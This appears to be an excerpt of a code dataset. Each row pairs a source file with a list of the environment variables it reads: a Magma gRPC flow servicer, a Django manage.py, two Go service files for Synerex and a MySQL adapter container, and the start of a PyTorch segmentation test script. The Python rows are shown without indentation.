def _install_flows_gy(self, request: ActivateFlowsRequest,
ip_address: IPAddress
) -> ActivateFlowsResult:
"""
Ensure that the RuleModResult is only successful if the flows are
successfully added in both the enforcer app and enforcement_stats.
Install enforcement_stats flows first because even if the enforcement
flow install fails after, no traffic will be directed to the
enforcement_stats flows.
"""
logging.debug('Activating GY flows for %s', request.sid.id)
self._update_version(request, ip_address)
# Install rules in enforcement stats
enforcement_stats_res = self._activate_rules_in_enforcement_stats(
request.sid.id, ip_address, request.apn_ambr, request.rule_ids,
request.dynamic_rules)
failed_static_rule_results, failed_dynamic_rule_results = \
_retrieve_failed_results(enforcement_stats_res)
# Do not install any rules that failed to install in enforcement_stats.
static_rule_ids = \
_filter_failed_static_rule_ids(request, failed_static_rule_results)
dynamic_rules = \
_filter_failed_dynamic_rules(request, failed_dynamic_rule_results)
gy_res = self._activate_rules_in_gy(request.sid.id, ip_address,
request.apn_ambr, static_rule_ids, dynamic_rules)
# Include the failed rules from enforcement_stats in the response.
gy_res.static_rule_results.extend(failed_static_rule_results)
gy_res.dynamic_rule_results.extend(failed_dynamic_rule_results)
return gy_res
def _activate_rules_in_enforcement_stats(self, imsi: str,
ip_addr: IPAddress,
apn_ambr: AggregatedMaximumBitrate,
static_rule_ids: List[str],
dynamic_rules: List[PolicyRule]
) -> ActivateFlowsResult:
if not self._service_manager.is_app_enabled(
EnforcementStatsController.APP_NAME):
return ActivateFlowsResult()
enforcement_stats_res = self._enforcement_stats.activate_rules(
imsi, ip_addr, apn_ambr, static_rule_ids, dynamic_rules)
_report_enforcement_stats_failures(enforcement_stats_res, imsi)
return enforcement_stats_res
def _activate_rules_in_enforcement(self, imsi: str, ip_addr: IPAddress,
apn_ambr: AggregatedMaximumBitrate,
static_rule_ids: List[str],
dynamic_rules: List[PolicyRule]
) -> ActivateFlowsResult:
# TODO: this will crash pipelined if called with both static rules
# and dynamic rules at the same time
enforcement_res = self._enforcer_app.activate_rules(
imsi, ip_addr, apn_ambr, static_rule_ids, dynamic_rules)
# TODO ?? Should the enforcement failure be reported per imsi session
_report_enforcement_failures(enforcement_res, imsi)
return enforcement_res
def _activate_rules_in_gy(self, imsi: str, ip_addr: IPAddress,
apn_ambr: AggregatedMaximumBitrate,
static_rule_ids: List[str],
dynamic_rules: List[PolicyRule]
) -> ActivateFlowsResult:
gy_res = self._gy_app.activate_rules(imsi, ip_addr, apn_ambr, static_rule_ids,
dynamic_rules)
# TODO: add metrics
return gy_res
def DeactivateFlows(self, request, context):
"""
Deactivate flows for a subscriber
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
self._loop.call_soon_threadsafe(self._deactivate_flows, request)
return DeactivateFlowsResult()
def _deactivate_flows(self, request):
"""
Deactivate flows for ipv4 / ipv6 or both
CWF won't have an ip_addr passed
"""
if self._service_config['setup_type'] == 'CWF' or request.ip_addr:
ipv4 = convert_ipv4_str_to_ip_proto(request.ip_addr)
if request.request_origin.type == RequestOriginType.GX:
self._deactivate_flows_gx(request, ipv4)
else:
self._deactivate_flows_gy(request, ipv4)
if request.ipv6_addr:
ipv6 = convert_ipv6_bytes_to_ip_proto(request.ipv6_addr)
self._update_ipv6_prefix_store(request.ipv6_addr)
if request.request_origin.type == RequestOriginType.GX:
self._deactivate_flows_gx(request, ipv6)
else:
self._deactivate_flows_gy(request, ipv6)
def _deactivate_flows_gx(self, request, ip_address: IPAddress):
logging.debug('Deactivating GX flows for %s', request.sid.id)
if request.rule_ids:
for rule_id in request.rule_ids:
self._service_manager.session_rule_version_mapper \
.update_version(request.sid.id, ip_address,
rule_id)
else:
# If no rule ids are given, all flows are deactivated
self._service_manager.session_rule_version_mapper.update_version(
request.sid.id, ip_address)
if request.remove_default_drop_flows:
self._enforcement_stats.deactivate_default_flow(request.sid.id,
ip_address)
self._enforcer_app.deactivate_rules(request.sid.id, ip_address,
request.rule_ids)
def _deactivate_flows_gy(self, request, ip_address: IPAddress):
logging.debug('Deactivating GY flows for %s', request.sid.id)
# Only deactivate requested rules here to not affect GX
if request.rule_ids:
for rule_id in request.rule_ids:
self._service_manager.session_rule_version_mapper \
.update_version(request.sid.id, ip_address, rule_id)
self._gy_app.deactivate_rules(request.sid.id, ip_address,
request.rule_ids)
def GetPolicyUsage(self, request, context):
"""
Get policy usage stats
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementStatsController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
fut = Future()
self._loop.call_soon_threadsafe(
self._enforcement_stats.get_policy_usage, fut)
return fut.result()
# --------------------------
# IPFIX App
# --------------------------
def UpdateIPFIXFlow(self, request, context):
"""
Update IPFIX sampling record
"""
self._log_grpc_payload(request)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
# Install trace flow
self._loop.call_soon_threadsafe(
self._ipfix_app.add_ue_sample_flow, request.sid.id,
request.msisdn, request.ap_mac_addr, request.ap_name,
request.pdp_start_time)
resp = FlowResponse()
return resp
# --------------------------
# DPI App
# --------------------------
def CreateFlow(self, request, context):
"""
Add dpi flow
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
DPIController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
self._loop.call_soon_threadsafe(self._dpi_app.add_classify_flow,
request.match, request.state,
request.app_name, request.service_type)
return resp
def RemoveFlow(self, request, context):
"""
        Remove dpi flow
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
DPIController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
self._loop.call_soon_threadsafe(self._dpi_app.remove_classify_flow,
request.match)
return resp
def UpdateFlowStats(self, request, context):
"""
Update stats for a flow
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
DPIController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
return resp
# --------------------------
# UE MAC App
# --------------------------
def SetupUEMacFlows(self, request, context) -> SetupFlowsResult:
"""
Activate a list of attached UEs
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
UEMacAddressController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
ret = self._ue_mac_app.is_ready_for_restart_recovery(request.epoch)
if ret != SetupFlowsResult.SUCCESS:
return SetupFlowsResult(result=ret)
fut = Future()
self._loop.call_soon_threadsafe(self._setup_ue_mac,
request, fut)
return fut.result()
def _setup_ue_mac(self, request: SetupUEMacRequest,
                      fut: 'Future[SetupFlowsResult]'
) -> SetupFlowsResult:
res = self._ue_mac_app.handle_restart(request.requests)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
for req in request.requests:
self._ipfix_app.add_ue_sample_flow(req.sid.id, req.msisdn,
req.ap_mac_addr,
req.ap_name,
req.pdp_start_time)
fut.set_result(res)
def AddUEMacFlow(self, request, context):
"""
Associate UE MAC address to subscriber
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
UEMacAddressController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
# 12 hex characters + 5 colons
if len(request.mac_addr) != 17:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details('Invalid UE MAC address provided')
return None
fut = Future()
self._loop.call_soon_threadsafe(self._add_ue_mac_flow, request, fut)
return fut.result()
    def _add_ue_mac_flow(self, request, fut: 'Future[FlowResponse]'):
res = self._ue_mac_app.add_ue_mac_flow(request.sid.id, request.mac_addr)
fut.set_result(res)
def DeleteUEMacFlow(self, request, context):
"""
Delete UE MAC address to subscriber association
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
UEMacAddressController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
# 12 hex characters + 5 colons
if len(request.mac_addr) != 17:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details('Invalid UE MAC address provided')
return None
self._loop.call_soon_threadsafe(
self._ue_mac_app.delete_ue_mac_flow,
request.sid.id, request.mac_addr)
if self._service_manager.is_app_enabled(CheckQuotaController.APP_NAME):
self._loop.call_soon_threadsafe(
self._check_quota_app.remove_subscriber_flow, request.sid.id)
if self._service_manager.is_app_enabled(VlanLearnController.APP_NAME):
self._loop.call_soon_threadsafe(
self._vlan_learn_app.remove_subscriber_flow, request.sid.id)
if self._service_manager.is_app_enabled(TunnelLearnController.APP_NAME):
self._loop.call_soon_threadsafe(
self._tunnel_learn_app.remove_subscriber_flow, request.mac_addr)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
# Delete trace flow
self._loop.call_soon_threadsafe(
self._ipfix_app.delete_ue_sample_flow, request.sid.id)
resp = FlowResponse()
return resp
# --------------------------
# Check Quota App
# --------------------------
def SetupQuotaFlows(self, request, context) -> SetupFlowsResult:
"""
Activate a list of quota rules
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
CheckQuotaController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
ret = self._check_quota_app.is_ready_for_restart_recovery(request.epoch)
if ret != SetupFlowsResult.SUCCESS:
return SetupFlowsResult(result=ret)
fut = Future()
self._loop.call_soon_threadsafe(self._setup_quota,
request, fut)
return fut.result()
def _setup_quota(self, request: SetupQuotaRequest,
                     fut: 'Future[SetupFlowsResult]'
) -> SetupFlowsResult:
res = self._check_quota_app.handle_restart(request.requests)
fut.set_result(res)
def UpdateSubscriberQuotaState(self, request, context):
"""
        Updates the subscriber quota state
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
CheckQuotaController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
self._loop.call_soon_threadsafe(
self._check_quota_app.update_subscriber_quota_state, request.updates)
return resp
# --------------------------
# Debugging
# --------------------------
def GetAllTableAssignments(self, request, context):
"""
Get the flow table assignment for all apps ordered by main table number
and name
"""
self._log_grpc_payload(request)
table_assignments = self._service_manager.get_all_table_assignments()
return AllTableAssignments(table_assignments=[
TableAssignment(app_name=app_name, main_table=tables.main_table,
scratch_tables=tables.scratch_tables) for
app_name, tables in table_assignments.items()])
# --------------------------
# Internal
# --------------------------
def _log_grpc_payload(self, grpc_request):
if not grpc_request:
return
indent = ' '
dbl_indent = indent + indent
indented_text = dbl_indent + \
str(grpc_request).replace('\n', '\n' + dbl_indent)
log_msg = 'Got RPC payload:\n{0}{1} {{\n{2}\n{0}}}'.format(indent,
grpc_request.DESCRIPTOR.name, indented_text.rstrip())
grpc_msg_queue.put(log_msg)
if grpc_msg_queue.qsize() > 100:
grpc_msg_queue.get()
if not self._print_grpc_payload:
return
logging.info(log_msg)
def _retrieve_failed_results(activate_flow_result: ActivateFlowsResult
) -> Tuple[List[RuleModResult],
List[RuleModResult]]:
failed_static_rule_results = \
[result for result in activate_flow_result.static_rule_results
if result.result == RuleModResult.FAILURE]
failed_dynamic_rule_results = \
[result for result in
activate_flow_result.dynamic_rule_results if
result.result == RuleModResult.FAILURE]
return failed_static_rule_results, failed_dynamic_rule_results
def _filter_failed_static_rule_ids(request: ActivateFlowsRequest,
failed_results: List[RuleModResult]
) -> List[str]:
failed_static_rule_ids = [result.rule_id for result in failed_results]
return [rule_id for rule_id in request.rule_ids if
rule_id not in failed_static_rule_ids]
def _filter_failed_dynamic_rules(request: ActivateFlowsRequest,
failed_results: List[RuleModResult]
) -> List[PolicyRule]:
failed_dynamic_rule_ids = [result.rule_id for result in failed_results]
return [rule for rule in request.dynamic_rules if
rule.id not in failed_dynamic_rule_ids]
def _report_enforcement_failures(activate_flow_result: ActivateFlowsResult,
imsi: str):
rule_results = chain(activate_flow_result.static_rule_results,
activate_flow_result.dynamic_rule_results)
for result in rule_results:
if result.result == RuleModResult.SUCCESS:
continue
ENFORCEMENT_RULE_INSTALL_FAIL.labels(rule_id=result.rule_id,
imsi=imsi).inc()
def _report_enforcement_stats_failures(
activate_flow_result: ActivateFlowsResult,
imsi: str):
rule_results = chain(activate_flow_result.static_rule_results,
activate_flow_result.dynamic_rule_results)
for result in rule_results:
if result.result == RuleModResult.SUCCESS:
continue
ENFORCEMENT_STATS_RULE_INSTALL_FAIL.labels(rule_id=result.rule_id,
imsi=imsi).inc()
| [] | [] | ["MAGMA_PRINT_GRPC_PAYLOAD"] | [] | ["MAGMA_PRINT_GRPC_PAYLOAD"] | python | 1 | 0 | |
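The payload-logging helper in the servicer above layers an environment-variable override on top of a service-config default and keeps only the last 100 gRPC messages in memory. A small stand-alone sketch of that pattern, with SERVICE_CONFIG as an illustrative stand-in for the real config object:
import os
import queue

SERVICE_CONFIG = {'magma_print_grpc_payload': False}  # illustrative stand-in for the service config

# The environment variable wins; otherwise fall back to the config default.
print_payload = os.environ.get('MAGMA_PRINT_GRPC_PAYLOAD')
if print_payload is None:
    print_payload = SERVICE_CONFIG.get('magma_print_grpc_payload', False)

recent_msgs = queue.Queue()

def remember(msg, limit=100):
    """Keep at most `limit` recent messages, dropping the oldest first."""
    recent_msgs.put(msg)
    if recent_msgs.qsize() > limit:
        recent_msgs.get()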
server/gaiaApi/manage.py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gaiaApi.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
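Worth noting for the manage.py entry: os.environ.setdefault only fills the variable in when it is absent, so a DJANGO_SETTINGS_MODULE exported by the shell always takes precedence over the hard-coded 'gaiaApi.settings'. A tiny sketch:
import os

os.environ['DJANGO_SETTINGS_MODULE'] = 'custom.settings'        # pretend the shell exported this
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gaiaApi.settings')
print(os.environ['DJANGO_SETTINGS_MODULE'])                      # prints custom.settings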
provider/pod-manager/pod-manager.go
|
package main
import (
"flag"
"fmt"
"log"
"os"
"sync"
"time"
"github.com/google/uuid"
api "github.com/synerex/synerex_alpha/api"
napi "github.com/synerex/synerex_alpha/nodeapi"
"github.com/synerex/synerex_alpha/provider/simutil"
"github.com/synerex/synerex_alpha/util"
"google.golang.org/grpc"
)
var (
myProvider *api.Provider
synerexAddr string
nodeIdAddr string
port string
startFlag bool
masterClock int
workerHosts []string
mu sync.Mutex
simapi *api.SimAPI
//providerManager *Manager
pm *simutil.ProviderManager
logger *util.Logger
waiter *api.Waiter
)
func init() {
waiter = api.NewWaiter()
startFlag = false
masterClock = 0
workerHosts = make([]string, 0)
logger = util.NewLogger()
flag.Parse()
//providerManager = NewManager()
synerexAddr = os.Getenv("SYNEREX_SERVER")
if synerexAddr == "" {
synerexAddr = "127.0.0.1:10000"
}
nodeIdAddr = os.Getenv("NODEID_SERVER")
if nodeIdAddr == "" {
nodeIdAddr = "127.0.0.1:9000"
}
port = os.Getenv("PORT")
if port == "" {
port = "9990"
}
}
////////////////////////////////////////////////////////////
//////////// Demand Supply Callback ////////////////
///////////////////////////////////////////////////////////
// Callback for Supply messages
func supplyCallback(clt *api.SMServiceClient, sp *api.Supply) {
}
// Callback for Demand messages
func demandCallback(clt *api.SMServiceClient, dm *api.Demand) {
//tid := dm.GetSimDemand().GetSenderId()
//pid := myProvider.Id
// check if supply is match with my demand.
switch dm.GetSimDemand().GetType() {
case api.DemandType_CREATE_POD_REQUEST:
		// handle the create pod request
cpr := dm.GetSimDemand().GetCreatePodRequest()
fmt.Printf("get CreatePodRequest %v\n", cpr)
		// notify the sender that the request has been handled
senderInfo := myProvider.Id
targets := []uint64{dm.GetSimDemand().GetSenderId()}
msgId := dm.GetSimDemand().GetMsgId()
simapi.CreatePodResponse(senderInfo, targets, msgId)
logger.Info("Finish: Create Pod")
case api.DemandType_DELETE_POD_REQUEST:
		// handle the delete pod request
cpr := dm.GetSimDemand().GetDeletePodRequest()
fmt.Printf("get DeletePodRequest %v\n", cpr)
		// notify the sender that the request has been handled
senderInfo := myProvider.Id
targets := []uint64{dm.GetSimDemand().GetSenderId()}
msgId := dm.GetSimDemand().GetMsgId()
simapi.DeletePodResponse(senderInfo, targets, msgId)
logger.Info("Finish: Delete Pod")
}
}
func main() {
// ProviderManager
uid, _ := uuid.NewRandom()
myProvider = &api.Provider{
Id: uint64(uid.ID()),
Name: "PodManager",
Type: api.ProviderType_MASTER,
}
pm = simutil.NewProviderManager(myProvider)
// Connect to Node Server
nodeapi := napi.NewNodeAPI()
for {
err := nodeapi.RegisterNodeName(nodeIdAddr, "PodManager", false)
if err == nil {
logger.Info("connected NodeID server!")
go nodeapi.HandleSigInt()
nodeapi.RegisterDeferFunction(nodeapi.UnRegisterNode)
break
} else {
logger.Warn("NodeID Error... reconnecting...")
time.Sleep(2 * time.Second)
}
}
// Connect to Synerex Server
var opts []grpc.DialOption
opts = append(opts, grpc.WithInsecure())
conn, err := grpc.Dial(synerexAddr, opts...)
if err != nil {
log.Fatalf("fail to dial: %v", err)
}
nodeapi.RegisterDeferFunction(func() { conn.Close() })
client := api.NewSynerexClient(conn)
	argJson := "{Client:PodManager}"
// api
fmt.Printf("client: %v\n", client)
simapi = api.NewSimAPI()
	simapi.RegistClients(client, myProvider.Id, argJson) // create a client for each channel
	simapi.SubscribeAll(demandCallback, supplyCallback) // subscribe to each channel
logger.Info("Connected Synerex Server!\n")
wg := sync.WaitGroup{}
wg.Add(1)
wg.Wait()
nodeapi.CallDeferFunctions() // cleanup!
}
| ["\"SYNEREX_SERVER\"", "\"NODEID_SERVER\"", "\"PORT\""] | [] | ["SYNEREX_SERVER", "PORT", "NODEID_SERVER"] | [] | ["SYNEREX_SERVER", "PORT", "NODEID_SERVER"] | go | 3 | 0 | |
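The Go provider above resolves SYNEREX_SERVER, NODEID_SERVER and PORT with hard-coded fallbacks and loops until node registration succeeds. The same idea expressed in Python, as an illustration only; register_node is a placeholder, not a real API:
import os
import time

synerex_addr = os.getenv('SYNEREX_SERVER', '127.0.0.1:10000')
nodeid_addr = os.getenv('NODEID_SERVER', '127.0.0.1:9000')
port = os.getenv('PORT', '9990')

def register_node(addr):
    """Placeholder for the real node registration call."""
    return True

# Keep retrying until the node-ID server accepts the registration.
while not register_node(nodeid_addr):
    print('NodeID Error... reconnecting...')
    time.sleep(2)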
configs/container/secondaryadapterscontainer.go
|
package container
import (
"github.com/raulinoneto/transactions-routines/internal/secondary/persistence"
"github.com/raulinoneto/transactions-routines/internal/secondary/rx"
"github.com/raulinoneto/transactions-routines/pkg/domains/transactions"
"os"
)
func (c *Container) GetMySqlAdapter() *persistence.MySqlAdapter {
if c.mySqlAdapter == nil {
c.mySqlAdapter = persistence.NewMySqlAdapter(
os.Getenv("DB_ADAPTER"),
os.Getenv("DB_USER"),
os.Getenv("DB_PASSWORD"),
os.Getenv("DB_ADDR"),
os.Getenv("DB_PORT"),
os.Getenv("DB_NAME"),
)
c.mySqlAdapter.TestConnection()
}
return c.mySqlAdapter
}
func (c *Container) GetAccountMySqlAdapter() persistence.AccountAdapter {
if c.accountMySqlAdapter == nil {
c.accountMySqlAdapter = persistence.NewAccountMySqlAdapter(c.GetMySqlAdapter())
}
return c.accountMySqlAdapter
}
func (c *Container) GetTransactionsMySqlAdapter() transactions.TransactionRepository {
if c.transactionsMySqlAdapter == nil {
c.transactionsMySqlAdapter = persistence.NewTransactionsMySqlAdapter(c.GetMySqlAdapter())
}
return c.transactionsMySqlAdapter
}
func (c *Container) GetTransactionsObserverAdapter() *rx.TransactionsObserverAdapter {
if c.transactionObserver == nil {
c.transactionObserver = rx.NewTransactionsObserverAdapter()
}
return c.transactionObserver
}
| ["\"DB_ADAPTER\"", "\"DB_USER\"", "\"DB_PASSWORD\"", "\"DB_ADDR\"", "\"DB_PORT\"", "\"DB_NAME\""] | [] | ["DB_PASSWORD", "DB_ADAPTER", "DB_PORT", "DB_ADDR", "DB_NAME", "DB_USER"] | [] | ["DB_PASSWORD", "DB_ADAPTER", "DB_PORT", "DB_ADDR", "DB_NAME", "DB_USER"] | go | 6 | 0 | |
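The container above builds each adapter lazily on first use and caches it, with the MySQL connection assembled from the DB_* variables. A hedged Python sketch of the same lazy-singleton idea; Container and make_dsn are illustrative names, not part of the Go package:
import os

def make_dsn():
    """Assemble a connection string from the same DB_* variables the Go container reads."""
    return '{adapter}://{user}:{password}@{addr}:{port}/{name}'.format(
        adapter=os.getenv('DB_ADAPTER', 'mysql'),
        user=os.getenv('DB_USER', ''),
        password=os.getenv('DB_PASSWORD', ''),
        addr=os.getenv('DB_ADDR', 'localhost'),
        port=os.getenv('DB_PORT', '3306'),
        name=os.getenv('DB_NAME', ''),
    )

class Container:
    def __init__(self):
        self._dsn = None

    @property
    def dsn(self):
        # Build once on first access, then reuse (mirrors the nil-check in the Go code).
        if self._dsn is None:
            self._dsn = make_dsn()
        return self._dsn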
src/semseg/tool/test.py
|
import os
import time
import logging
import argparse
import cv2
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import torch.nn.parallel
import torch.utils.data
from util import dataset, transform, config
from util.util import AverageMeter, intersectionAndUnion, check_makedirs, colorize
cv2.ocl.setUseOpenCL(False)
from collections import namedtuple
Label = namedtuple( 'Label' , [
'name' , # The identifier of this label, e.g. 'car', 'person', ... .
# We use them to uniquely name a class
'id' , # An integer ID that is associated with this label.
# The IDs are used to represent the label in ground truth images
# An ID of -1 means that this label does not have an ID and thus
# is ignored when creating ground truth images (e.g. license plate).
# Do not modify these IDs, since exactly these IDs are expected by the
# evaluation server.
'trainId' , # Feel free to modify these IDs as suitable for your method. Then create
# ground truth images with train IDs, using the tools provided in the
# 'preparation' folder. However, make sure to validate or submit results
# to our evaluation server using the regular IDs above!
# For trainIds, multiple labels might have the same ID. Then, these labels
# are mapped to the same class in the ground truth images. For the inverse
# mapping, we use the label that is defined first in the list below.
# For example, mapping all void-type classes to the same ID in training,
# might make sense for some approaches.
# Max value is 255!
'category' , # The name of the category that this label belongs to
'categoryId' , # The ID of this category. Used to create ground truth images
# on category level.
'hasInstances', # Whether this label distinguishes between single instances or not
'ignoreInEval', # Whether pixels having this class as ground truth label are ignored
# during evaluations or not
'color' , # The color of this label
] )
labels = [
# name id trainId category catId hasInstances ignoreInEval color
Label( 'unlabeled' , 0 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'ego vehicle' , 1 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'rectification border' , 2 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'out of roi' , 3 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'static' , 4 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'dynamic' , 5 , 255 , 'void' , 0 , False , True , (111, 74, 0) ),
Label( 'ground' , 6 , 255 , 'void' , 0 , False , True , ( 81, 0, 81) ),
Label( 'road' , 7 , 0 , 'flat' , 1 , False , False , (128, 64,128) ),
Label( 'sidewalk' , 8 , 1 , 'flat' , 1 , False , False , (244, 35,232) ),
Label( 'parking' , 9 , 255 , 'flat' , 1 , False , True , (250,170,160) ),
Label( 'rail track' , 10 , 255 , 'flat' , 1 , False , True , (230,150,140) ),
Label( 'building' , 11 , 2 , 'construction' , 2 , False , False , ( 70, 70, 70) ),
Label( 'wall' , 12 , 3 , 'construction' , 2 , False , False , (102,102,156) ),
Label( 'fence' , 13 , 4 , 'construction' , 2 , False , False , (190,153,153) ),
Label( 'guard rail' , 14 , 255 , 'construction' , 2 , False , True , (180,165,180) ),
Label( 'bridge' , 15 , 255 , 'construction' , 2 , False , True , (150,100,100) ),
Label( 'tunnel' , 16 , 255 , 'construction' , 2 , False , True , (150,120, 90) ),
Label( 'pole' , 17 , 5 , 'object' , 3 , False , False , (153,153,153) ),
Label( 'polegroup' , 18 , 255 , 'object' , 3 , False , True , (153,153,153) ),
Label( 'traffic light' , 19 , 6 , 'object' , 3 , False , False , (250,170, 30) ),
Label( 'traffic sign' , 20 , 7 , 'object' , 3 , False , False , (220,220, 0) ),
Label( 'vegetation' , 21 , 8 , 'nature' , 4 , False , False , (107,142, 35) ),
Label( 'terrain' , 22 , 9 , 'nature' , 4 , False , False , (152,251,152) ),
Label( 'sky' , 23 , 10 , 'sky' , 5 , False , False , ( 70,130,180) ),
Label( 'person' , 24 , 11 , 'human' , 6 , True , False , (220, 20, 60) ),
Label( 'rider' , 25 , 12 , 'human' , 6 , True , False , (255, 0, 0) ),
Label( 'car' , 26 , 13 , 'vehicle' , 7 , True , False , ( 0, 0,142) ),
Label( 'truck' , 27 , 14 , 'vehicle' , 7 , True , False , ( 0, 0, 70) ),
Label( 'bus' , 28 , 15 , 'vehicle' , 7 , True , False , ( 0, 60,100) ),
Label( 'caravan' , 29 , 255 , 'vehicle' , 7 , True , True , ( 0, 0, 90) ),
Label( 'trailer' , 30 , 255 , 'vehicle' , 7 , True , True , ( 0, 0,110) ),
Label( 'train' , 31 , 16 , 'vehicle' , 7 , True , False , ( 0, 80,100) ),
Label( 'motorcycle' , 32 , 17 , 'vehicle' , 7 , True , False , ( 0, 0,230) ),
Label( 'bicycle' , 33 , 18 , 'vehicle' , 7 , True , False , (119, 11, 32) ),
Label( 'license plate' , -1 , -1 , 'vehicle' , 7 , False , True , ( 0, 0,142) ),
]
trainid2id = {label.trainId: label.id for label in labels}
def get_parser():
parser = argparse.ArgumentParser(description='PyTorch Semantic Segmentation')
parser.add_argument('--config', type=str, default='config/ade20k/ade20k_pspnet50.yaml', help='config file')
parser.add_argument('opts', help='see config/ade20k/ade20k_pspnet50.yaml for all options', default=None, nargs=argparse.REMAINDER)
args = parser.parse_args()
assert args.config is not None
cfg = config.load_cfg_from_cfg_file(args.config)
if args.opts is not None:
cfg = config.merge_cfg_from_list(cfg, args.opts)
return cfg
def get_logger():
logger_name = "main-logger"
logger = logging.getLogger(logger_name)
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
fmt = "[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s"
handler.setFormatter(logging.Formatter(fmt))
logger.addHandler(handler)
return logger
def check(args):
assert args.classes > 1
assert args.zoom_factor in [1, 2, 4, 8]
assert args.split in ['train', 'val', 'test']
if args.arch == 'psp':
assert (args.train_h - 1) % 8 == 0 and (args.train_w - 1) % 8 == 0
elif args.arch == 'psa':
if args.compact:
args.mask_h = (args.train_h - 1) // (8 * args.shrink_factor) + 1
args.mask_w = (args.train_w - 1) // (8 * args.shrink_factor) + 1
else:
assert (args.mask_h is None and args.mask_w is None) or (args.mask_h is not None and args.mask_w is not None)
if args.mask_h is None and args.mask_w is None:
args.mask_h = 2 * ((args.train_h - 1) // (8 * args.shrink_factor) + 1) - 1
args.mask_w = 2 * ((args.train_w - 1) // (8 * args.shrink_factor) + 1) - 1
else:
assert (args.mask_h % 2 == 1) and (args.mask_h >= 3) and (
args.mask_h <= 2 * ((args.train_h - 1) // (8 * args.shrink_factor) + 1) - 1)
assert (args.mask_w % 2 == 1) and (args.mask_w >= 3) and (
args.mask_w <= 2 * ((args.train_h - 1) // (8 * args.shrink_factor) + 1) - 1)
    elif args.arch in ('deeplabv2', 'psptrans'):
        pass
    else:
        raise Exception('architecture {} not supported yet'.format(args.arch))
import subprocess
# operations for polyaxon
def polyaxon_data_prepare():
from polyaxon_client.tracking import get_data_paths, get_outputs_refs_paths, get_outputs_path
# fetch data to job pods
sync_dest_dir = fetch_data_from_ssd()
#print("sync_dest_dir")
#print(sync_dest_dir)
# os.system('ls ' + sync_dest_dir + '/cityscapes')
args.data_root = os.path.join(sync_dest_dir, args.data_root)
# args.train_list = os.path.join(sync_dest_dir, args.train_list)
# args.train_labeled_list = os.path.join(sync_dest_dir, args.train_labeled_list)
# args.train_unlabeled_list = os.path.join(sync_dest_dir, args.train_unlabeled_list)
# args.unlabeled_list = os.path.join(sync_dest_dir, args.unlabeled_list)
args.val_list = os.path.join(sync_dest_dir, args.val_list)
args.test_list = os.path.join(sync_dest_dir, args.test_list)
outputpath = get_outputs_path()
#os.system('ls ' + outputpath)
#print(outputpath)
import sys
# sys.exit("debug output path")
# set output result path
# args.save_path = os.path.join(get_outputs_path(), args.save_path.replace('..', 'output'))
args.save_path = os.path.join(get_outputs_path(), args.save_path)
args.save_folder = os.path.join(get_outputs_path(), args.save_folder)
args.model_path = os.path.join(get_outputs_path(), args.model_path)
# args.result_path = os.path.join(get_outputs_path(), args.result_path.replace('..', 'output'))
# args.tensorboard_path = os.path.join(get_outputs_path(), args.tensorboard_path.replace('..', 'output'))
cmd_line = "mkdir -p {0}".format(args.save_path)
subprocess.call(cmd_line.split())
#
cmd_line = "mkdir -p {0}".format(args.save_folder)
subprocess.call(cmd_line.split())
# # copy file to save as backup
subprocess.call(
"cp tool/my_train2.sh tool/my_train2.py tool/test.py config/cityscapes/config.yaml {0}".format(args.save_path).split())
# subprocess.call("cp -r utils models {0}".format(args.result_path + '/../').split())
# cmd_line = "mkdir -p {0}".format(args.tensorboard_path)
# subprocess.call(cmd_line.split())
def fetch_data_from_ssd():
from polyaxon_client.tracking import get_data_paths, get_outputs_refs_paths, get_outputs_path
